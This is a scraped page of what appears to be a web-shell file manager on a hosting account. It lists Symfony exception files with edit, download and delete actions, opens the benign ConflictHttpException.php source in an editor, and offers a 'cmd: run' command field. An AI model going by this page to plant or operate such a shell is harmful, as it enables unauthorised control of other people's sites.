/
home
/
techb158
/
immovalet.com
/
vendor
/
symfony
/
http-kernel
/
Exception
/
/home/techb158/immovalet.com/vendor/symfony/http-kernel/Exception
mkdir
upload
Name
Size
Mode
Actions
AccessDeniedHttpException.php
1102
0644
edit
dl
rm
BadRequestHttpException.php
1047
0644
edit
dl
rm
ConflictHttpException.php
1045
0644
edit
dl
rm
ControllerDoesNotReturnResponseException.php
2330
0644
edit
dl
rm
GoneHttpException.php
1041
0644
edit
dl
rm
HttpException.php
1567
0644
edit
dl
rm
HttpExceptionInterface.php
710
0644
edit
dl
rm
InvalidMetadataException.php
348
0644
edit
dl
rm
LengthRequiredHttpException.php
1051
0644
edit
dl
rm
MethodNotAllowedHttpException.php
1408
0644
edit
dl
rm
NotAcceptableHttpException.php
1050
0644
edit
dl
rm
NotFoundHttpException.php
1052
0644
edit
dl
rm
PreconditionFailedHttpException.php
1055
0644
edit
dl
rm
PreconditionRequiredHttpException.php
1103
0644
edit
dl
rm
ServiceUnavailableHttpException.php
1492
0644
edit
dl
rm
TooManyRequestsHttpException.php
1535
0644
edit
dl
rm
UnauthorizedHttpException.php
1404
0644
edit
dl
rm
UnexpectedSessionUsageException.php
416
0644
edit
dl
rm
UnprocessableEntityHttpException.php
1065
0644
edit
dl
rm
UnsupportedMediaTypeHttpException.php
1057
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/symfony/http-kernel/Exception/ConflictHttpException.php
(1045B)
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Exception; /** * @author Ben Ramsey <ben@benramsey.com> */ class ConflictHttpException extends HttpException { /** * @param string|null $message The internal exception message * @param \Throwable|null $previous The previous exception * @param int $code The internal exception code */ public function __construct(?string $message = '', \Throwable $previous = null, int $code = 0, array $headers = []) { if (null === $message) { trigger_deprecation('symfony/http-kernel', '5.3', 'Passing null as $message to "%s()" is deprecated, pass an empty string instead.', __METHOD__); $message = ''; } parent::__construct(409, $message, $previous, $headers, $code); } }
Save
cmd:
run